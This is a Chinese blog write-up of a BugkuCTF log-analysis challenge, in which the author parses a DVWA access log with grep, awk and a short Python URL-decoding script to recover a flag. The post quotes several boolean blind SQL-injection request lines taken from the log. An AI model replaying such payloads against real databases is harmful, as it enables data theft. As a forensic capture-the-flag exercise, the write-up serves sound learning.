日志分析
0x0 题目
BugkuCTF 日志分析
0x1 分析
head access.log
粗看文件内容是进行本地SQL盲注,并且日志格式规范,大致想法也就是进行格式匹配输出
cat access.log | grep flag > flag
果然出现dvwa.flag_is_here字段,经过URL解码后我们明显可以看出是字符暴力破解
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from urllib import parse
import os
os.system("cat access.log | grep flag | grep -v 404 | awk -F '\"' '{print $2}' > flag")
with open('flag1','w',encoding='utf-8') as f1:
with open('flag',encoding='utf-8') as f2:
while True:
tmp = f2.read()
if tmp:
tmp = parse.unquote(tmp)
f1.write(tmp)
else:
break
1
2
3
4
5
6
7
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>64 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>96 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>100 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>101 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),2,1))>96 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),2,1))>104 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
......
0x2 取键
1
cat flag1 | awk -F ',' '{print $4}' | tail -n +2
0x3 取值
1
cat flag1 | awk -F '>' '{print $2}' | awk -F ' ' '{print $1}'
0x4 结果
取相同的键中最高的值再加1,也就是破解的ASCII对应的十进制值,将其转换成ASCII值即可
总结
本来想写一个完整的 python 脚本,把键和值放在 dict字典里,多次尝试无果,最后发现自己实在太菜了…… 🙁
This post is licensed under
CC BY 4.0
by the author.